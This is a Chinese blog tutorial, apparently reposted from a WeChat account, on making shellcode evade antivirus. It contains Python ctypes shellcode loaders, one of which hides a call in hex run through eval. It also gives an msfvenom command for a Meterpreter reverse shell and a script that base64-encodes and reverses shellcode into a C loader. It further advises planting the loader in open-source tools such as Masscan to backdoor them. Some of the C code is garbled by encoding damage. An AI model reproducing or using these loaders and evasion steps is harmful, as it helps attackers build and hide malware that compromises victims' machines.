没有啥亮点Shellcode免杀入门教程
Shellcode执行工具编写思路
为了给大家讲怎么写shellcode执行盒,我特地找了一段Python的源代码给大家分析。
import ctypes
shellcode = """"""
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
ht=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))首先约会ctypes模块,然后将shellcode代码赋值给变量十六进制解码(MSF或Cs生成的之后,使用编码工具手动编码一次。)转换为字节码。然后使用ctypes,调用windows自带的dll,也就是内核32,使用VirtualAlloc函数分配内存,返回分配的首地址。然后再使用RtlMoveMemory,将shellcode复制到目标内存。使用CreateThread创建一个线程,使用WaitForSingleObject执行内存。总之,就是调用Kernel32.dll中的函数来。编写Shellcode执行工具,不止这一种放法。作者水平有限,请勿断章取义。
编写Shellcode执行工具
为了验证我们前面的思路是正确的,让我用其他语言来验证一下。这里,我们使用易语言吧,可以让大家看懂编写过程。
新建一个Windows窗口程序
画一个界面出来,大概就这样。
双击按钮进入添加事件,进入编辑界面。添加一个精易模块,等会要用他里面的方法来编写shellcode。创建shellcode变量,用来保存shellcode。
查看模块手册,就会发现模块自带VirtualAlloc RtlMoveMemory CreateThread WaitForSingleObject这四个方法,我们直接使用即可。
最终编写如下,如果你仔细比对Python源代码,你会发现真的基本上就是差不多的。
最后,让我们来测试一下吧。
MSF生成一个小弹窗测试一下。
使用一下K8飞刀的编码工具
获得编码以后的shellcode
获得HEx编码的Shellcode,复制粘贴到加载测试工具中,点击加载shellcode。我们就可以执行啦。
最后,总结一下,我们的思路没有错,确实是这样写的,各位不妨碍尝试其他语言写一下,自己多动手体会体会啦。
Shellcode上线免杀思路
个人经验告诉你,使用Python Ruby这种解释型语言,打包成EXE就算是正常程序也很有可能被拦截,而像C和GO以及C ++这种编译型语言则不会有这种问题。免杀,放在虚拟机,并且断网防止被上传,自己弄了老半天的东西免杀变成,却坚持不了多久。还有也不要上传VT等杀毒网站,会被厂商拿去分析的免杀的时候也不要上传到反对360的云查杀。下面我来叙述一下我的思路。
首先,我认为一段免杀360与火绒的Python加载器源代码。细心的小伙伴们可能会发现,这跟上面第一部分我称为的源代码很像。对的,这个就是在那个基础上运用了一下加密手段,来进行免杀的。使用hex将,360查杀的部分给藏了起来。在运行的时候,首先解密解密,然后进行评估,运用了等价替换的思路。问题来了,我为什么知道360查杀这里?这里给大家一个小方法,那就是不断的FUzz。像串联代码,我发现去掉了ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes .c_int(len(shellcode))),然后打包成exe,360则不查杀,就是不断的去尝试,最后知道他查杀哪里。
import ctypes
a = "shellcode"
shellcode=bytearray(a.decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
shell = "6374797065732e77696e646c6c2e6b65726e656c33322e52746c4d6f76654d656d6f7279286374797065732e635f696e7428707472292c206275662c206374797065732e635f696e74286c656e287368656c6c636f6465292929"
eval(shell.decode("hex"))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))第二个思路,使用一些正常滴开源项目,在里面加点料,达到免杀。经过本人不断地测试,发现效果属实顶。VT查杀轻轻松松可以控制在8左右。而且,相对于第一一个想法来说,也更容易,适合新手朋友。这里称为效果图,使用的是Masscan。
稍微给Masscan加了点料
Shellcode免杀实战
首先,去github上随手一搜索C写的程序,你开心就好。然后下载到本地,打开。我这里用的是vs2019,你们也可以用其他的,没有硬性要求。第一,这里准备两个东西,一个是base64加密解密的代码,另外一个是反相串行的代码。第二,找开源程序的时候,注意文件大小,太小的效果不好,太大的又太臃肿,几百K左右也可以,但是实际上也没有那么大的硬性要求。
static const unsigned char pr2six[256] =
{
/* ASCII table */
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
};
int Base64decode_len(const char* bufcoded)
{
int nbytesdecoded;
register const unsigned char* bufin;
register int nprbytes;
bufin = (const unsigned char*)bufcoded;
while (pr2six[*(bufin++)] <= 63);
nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
nbytesdecoded = ((nprbytes + 3) / 4) * 3;
return nbytesdecoded + 1;
}
int Base64decode(char* bufplain, const char* bufcoded)
{
int nbytesdecoded;
register const unsigned char* bufin;
register unsigned char* bufout;
register int nprbytes;
bufin = (const unsigned char*)bufcoded;
while (pr2six[*(bufin++)] <= 63);
nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
nbytesdecoded = ((nprbytes + 3) / 4) * 3;
bufout = (unsigned char*)bufplain;
bufin = (const unsigned char*)bufcoded;
while (nprbytes > 4) {
*(bufout++) =
(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
*(bufout++) =
(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
*(bufout++) =
(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
bufin += 4;
nprbytes -= 4;
}
/* Note: (nprbytes == 1) would be an error, so just ingore that case */
if (nprbytes > 1) {
*(bufout++) =
(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
}
if (nprbytes > 2) {
*(bufout++) =
(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
}
if (nprbytes > 3) {
*(bufout++) =
(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
}
*(bufout++) = '�';
nbytesdecoded -= (4 - nprbytes) & 3;
return nbytesdecoded;
}
static const char basis_64[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
int Base64encode_len(int len)
{
return ((len + 2) / 3 * 4) + 1;
}
int Base64encode(char* encoded, const char* string, int len)
{
int i;
char* p;
p = encoded;
for (i = 0; i < len - 2; i += 3) {
*p++ = basis_64[(string >> 2) & 0x3F];
*p++ = basis_64[((string & 0x3) << 4) |
((int)(string[i + 1] & 0xF0) >> 4)];
*p++ = basis_64[((string[i + 1] & 0xF) << 2) |
((int)(string[i + 2] & 0xC0) >> 6)];
*p++ = basis_64[string[i + 2] & 0x3F];
}
if (i < len) {
*p++ = basis_64[(string >> 2) & 0x3F];
if (i == (len - 1)) {
*p++ = basis_64[((string & 0x3) << 4)];
// *p++ = '=';
}
else {
*p++ = basis_64[((string & 0x3) << 4) |
((int)(string[i + 1] & 0xF0) >> 4)];
*p++ = basis_64[((string[i + 1] & 0xF) << 2)];
}
//*p++ = '=';
}
*p++ = '�';
return p - encoded;
}
string_change(unsigned char* p) {
int i, len;
char temp;
len = strlen(p);
for (size_t i = 0; i < (len / 2); i++)
{
temp = p[i];
p[i] = p[len - 1 - i];
p[len - 1 - i] = temp;
}
}
MSF生成代码
msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b 'x00' lhost=192.168.132.128 lport=4444 -f c -o shell.c
这里用一下base.py处理一下文件
import base64,sys
text = """#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
//windows控制台程序不出黑窗口
static const unsigned char pr2six[256] =
{
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
};
int Base64decode_len(const char* bufcoded)
{
int nbytesdecoded;
register const unsigned char* bufin;
register int nprbytes;
bufin = (const unsigned char*)bufcoded;
while (pr2six[*(bufin++)] <= 63);
nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
nbytesdecoded = ((nprbytes + 3) / 4) * 3;
return nbytesdecoded + 1;
}
int Base64decode(char* bufplain, const char* bufcoded)
{
int nbytesdecoded;
register const unsigned char* bufin;
register unsigned char* bufout;
register int nprbytes;
bufin = (const unsigned char*)bufcoded;
while (pr2six[*(bufin++)] <= 63);
nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;
nbytesdecoded = ((nprbytes + 3) / 4) * 3;
bufout = (unsigned char*)bufplain;
bufin = (const unsigned char*)bufcoded;
while (nprbytes > 4) {
*(bufout++) =
(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
*(bufout++) =
(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
*(bufout++) =
(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
bufin += 4;
nprbytes -= 4;
}
/* Note: (nprbytes == 1) would be an error, so just ingore that case */
if (nprbytes > 1) {
*(bufout++) =
(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
}
if (nprbytes > 2) {
*(bufout++) =
(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
}
if (nprbytes > 3) {
*(bufout++) =
(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
}
*(bufout++) = '\0';
nbytesdecoded -= (4 - nprbytes) & 3;
return nbytesdecoded;
}
static const char basis_64[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
int Base64encode_len(int len)
{
return ((len + 2) / 3 * 4) + 1;
}
int Base64encode(char* encoded, const char* string, int len)
{
int i;
char* p;
p = encoded;
for (i = 0; i < len - 2; i += 3) {
*p++ = basis_64[(string >> 2) & 0x3F];
*p++ = basis_64[((string & 0x3) << 4) |
((int)(string[i + 1] & 0xF0) >> 4)];
*p++ = basis_64[((string[i + 1] & 0xF) << 2) |
((int)(string[i + 2] & 0xC0) >> 6)];
*p++ = basis_64[string[i + 2] & 0x3F];
}
if (i < len) {
*p++ = basis_64[(string >> 2) & 0x3F];
if (i == (len - 1)) {
*p++ = basis_64[((string & 0x3) << 4)];
// *p++ = '=';
}
else {
*p++ = basis_64[((string & 0x3) << 4) |
((int)(string[i + 1] & 0xF0) >> 4)];
*p++ = basis_64[((string[i + 1] & 0xF) << 2)];
}
//*p++ = '=';
}
*p++ = '\0';
return p - encoded;
}
string_change(unsigned char* p) {
int i, len;
char temp;
len = strlen(p);
for (size_t i = 0; i < (len / 2); i++)
{
temp = p[i];
p[i] = p[len - 1 - i];
p[len - 1 - i] = temp;
}
}
main(){
unsigned char init_buf[] = "%s";
char kekeoyyds_bufs[1024] = { 0 };
char kekeoyyds_buf[1024] = { 0 };
string_change(init_buf);
Base64decode(kekeoyyds_bufs, init_buf);
Base64decode(kekeoyyds_buf, kekeoyyds_bufs);
char* dmagic_memory;
dmagic_memory = VirtualAlloc(NULL, sizeof(kekeoyyds_buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(dmagic_memory, kekeoyyds_buf, sizeof(kekeoyyds_buf));
}
"""
if __name__ == '__main__':
if len(sys.argv) == 3:
print("开始处理:%s" % sys.argv[1])
with open(sys.argv[1]) as file:
shellcode = ""
for i in file.readlines():
if "unsigned" not in i:
shellcode += i.strip("n").strip("r").strip(";").strip(""")
print(shellcode)
exec('shellcode = b"%s"' % shellcode)
shellcode = base64.b64encode(shellcode)
shellcode = base64.b64encode(shellcode)
shellcode = shellcode.decode("utf8")[::-1]
with open("./"+sys.argv[2],"w+") as shellcodefile:
shellcodefile.write(text % shellcode)
print("处理完毕:%s" % sys.argv[2])
else:
print(sys.argv)
print("python base.py shell.c shellcode.c")
在头部添加一下取消黑色窗口的小东西。
#pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"")
将base64编码函数和反转字符串函数共同复制进来。
快捷,重新生成,找到bin目录,查看exe。
放到虚拟机测试一下
MSF配置如下
然后要设置一下EnableStageEncoding为ture
效果如下
总结:shellcode免杀的执行方式不止我上面说的那个,其实还有很多。有兴趣的同学可以去github上看看https://github.com/TideSec/BypassAntiVirus,看看26到29。通过在masscan中植入后门代码来进行免杀,其实就是一个小小的测试。同学们完全可以自己去寻找其他语言开发的代码一样的植入进去。然后通过,反转串行,xor异或加密,base64加密等等方式来对抗杀软,相互结合使用效果会更好。
本文始发于微信公众号(疯猫网络):没有啥亮点的shellcode免杀
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论